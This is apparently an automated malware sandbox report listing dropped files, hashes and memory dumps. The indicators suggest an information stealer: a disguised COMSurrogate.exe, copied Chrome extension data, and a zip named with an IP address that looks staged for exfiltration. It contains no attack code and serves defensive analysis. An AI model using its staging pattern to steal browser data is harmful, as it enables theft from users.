SHA512 ecdc7cec5f200f87730ab90d844d2572dfdc767a816be57f4344f3db27f08dc256317cab2587198fdec66fe88499f903f0bc02e343aca523f07cbe4027f6ba22

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

MD5 124edf3ad57549a6e475f3bc4e6cfe51
SHA1 80f5187eeebb4a304e9caa0ce66fcd78c113d634
SHA256 638c51e173ca6b3469494a7e2e0b656021a761f77b4a83f3e430e82e7b9af675
SHA512 b6c1a9051feeffad54ba1092fd799d34a9578368d7e66b31780fe478c1def0eb4094dce2879003f7389f2f9d86b94a3ef3975e78092a604597841c9b8db120ee

C:\Users\Admin\AppData\Local\asm\COMSurrogate.exe

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 43a6c4edabf3ba9857b920b4711e6204
SHA1 dba2500a082d49c473a10d5c1660f46c731b442f
SHA256 dfb1405e89c84c3d5701bde57e00746319eb6a334e4c18a9416fdf30f32f67da
SHA512 89452aa312e76930885500c0eb06d0e3dfe887505f8723a47607f89a6812ec566d879d57fbc41ea5261a6e4589dad254911506fd3f89c87429661ae8994cf0f8

memory/3956-3711-0x0000000000400000-0x0000000000C62000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 6ca4a24f2ab489c2a287eae9803de223
SHA1 677acbd93e5210ed9a796c97ecb8b6d22e9568ee
SHA256 2cad5713b7c21d222da95fd80654c4a04da426bdd57c1b437651750e975ba51a
SHA512 7cf4812346eb93904f24776a7f2ba9521be1cdee34aea884815e8604304b4e2550808fc6e577fca0fe3256ea5705e6b8ed26f2abecc1028b77756dbad89cd509

C:\Users\Admin\AppData\Local\asm\COMSurrogate.exe

MD5 77334f046a50530cdc6e585e59165264
SHA1 657a584eafe86df36e719526d445b570e135d217
SHA256 eb6c487307c52793e0bc4d6a74770bbea2322f32edc466b25abacec3dd0e9c08
SHA512 97936dd74d7eef8d69dae0d83b6d1554bd54d5302b5b2ff886ff66c040b083d7d086089de12b57a491cf7269a7d076e4d2a52839aaac519386b77297bc3a5c90

memory/5928-3724-0x000001F82F4F0000-0x000001F82F51E000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 82742c2ba7a4918d25d7f05b46b2a8b7
SHA1 d61db73b9b9daf2d0fbc7563b41c60f2232a368b
SHA256 ec97ddcbfea8445124be7de1976945b852531520f62c465274dfa6749521310b
SHA512 c043c7eb380c364f9731cdcfbea5e25c92332fc307e399e8b83a353d039bb88f718cf78815280bc642ddd70152a5748d4c5db0f5b55d027a57726938884b9ada

memory/4896-3739-0x0000000007170000-0x0000000007182000-memory.dmp

memory/4896-3740-0x0000000007230000-0x000000000723A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\ArchiveContents\Chrome\ghbmnnjooekpmoecnnnilnnbdlolhkhi\000003.log

MD5 f67672c18281ad476bb09676baee42c4
SHA1 fb4e31c9a39545d822b2f18b0b87ca465e7768c9
SHA256 d96b3d82465808c49ce3c948745074d143504d00f44a9ff3b26a42f0c88e1f61
SHA512 ff37752848af570cb284f5fb65837472ddf9941992fffceb049a70c36d858c37e4e87016176b4e62d0eda63c235ca742411947d50d163cbc7823c50a734f0898

C:\Users\Admin\AppData\Local\Temp\ArchiveContents\Chrome\ghbmnnjooekpmoecnnnilnnbdlolhkhi\CURRENT

MD5 46295cac801e5d4857d09837238a6394
SHA1 44e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA256 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA512 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

C:\Users\Admin\AppData\Local\Temp\ArchiveContents\Chrome\ghbmnnjooekpmoecnnnilnnbdlolhkhi\LOG

MD5 9f1b6b4b1f4578ccda76e2d67baefe27
SHA1 013dd3dd1c26b8d6cbd935cb46d6b5454910b7eb
SHA256 81510791f2d75006a70bcc0db1e87d7f51e64753cb05525577e1c8eb1fbaa293
SHA512 33ed866cea3eced9b27df8e57a8eac0f1eb50351e0eb0907229ab8a9947a4ea8490084391a3eda5d7f50fd9bbb824015c12bdadc8a85c68fc66fe60928c407a8

C:\Users\Admin\AppData\Local\Temp\ArchiveContents\Chrome\ghbmnnjooekpmoecnnnilnnbdlolhkhi\LOG.old

MD5 d6de2d0ce8c61a8140fa1af9ec585667
SHA1 e16afc3dbcd8f33d2726a2eb35926f7293a70603
SHA256 53b8e4e1ae82772f002d31f80add2efd4dfe419a63e1460ac96ae2bd04295a42
SHA512 5ca6bafad803db0438ec3520f04eda9f7648d8bdbb99799de246f88f9469b3a50f19833f6b696466ad4778183fc295e72378819b1354052b0b3ea638c9c1dfe7

C:\Users\Admin\AppData\Local\Temp\ArchiveContents\Chrome\ghbmnnjooekpmoecnnnilnnbdlolhkhi\MANIFEST-000001

MD5 5af87dfd673ba2115e2fcf5cfdb727ab
SHA1 d5b5bbf396dc291274584ef71f444f420b6056f1
SHA256 f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4
SHA512 de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

C:\Users\Admin\AppData\Local\Temp\N_Admin_181.215.176.83.zip

MD5 7fef71b82c2dd468ba224419986d4ad9
SHA1 b878f99d48230d23f9dd8ff34ca720d7db3bc98a
SHA256 88887a1b6b37dfc46177f7e6f4a1489481fc82a7e40f26caeb2a385d53b25f71
SHA512 bd310264acd2b4f15cdadbf78819d92e06e23b567403bfb7bf31556b66ed444c64477fb537491e00ca722e881c149d4a25183e8cde080f73e6706e1a9136109c

memory/4924-3753-0x0000000000940000-0x0000000000DEF000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\85mw8mk9.default-release\datareporting\glean\db\data.safe.tmp

MD5 cdad3fe34c53a9e65f1069d2a1d057f9
SHA1 a7d9e2dec4950ad942af49cb7cda4f6bbeb84cdd
SHA256 330e7996e52ff1968f014fcef0fd6c8a4f5f7cee6d1bcee57d27edd3284582fc
SHA512 ce4ca4e495e5a675ffeaabb3fafb493367496fd25b597bf07d08583f1bd9586e72f5db0479bd43015a92614fe3ed78dc2adf7433061b93e652efc93cc5f77408

C:\Users\Admin\AppData\Local\asm\mi.exe

MD5 f6d520ae125f03056c4646c508218d16
SHA1 f65e63d14dd57eadb262deaa2b1a8a965a2a962c
SHA256 d2fcf28897ddc2137141d838b734664ff7592e03fcd467a433a51cb4976b4fb1
SHA512 d1ec3da141ce504993a0cbf8ea4b719ffa40a2be4941c18ffc64ec3f71435f7bddadda6032ec0ae6cada66226ee39a2012079ed318df389c7c6584ad3e1c334d

memory/3956-3758-0x0000000000400000-0x0000000000C62000-memory.dmp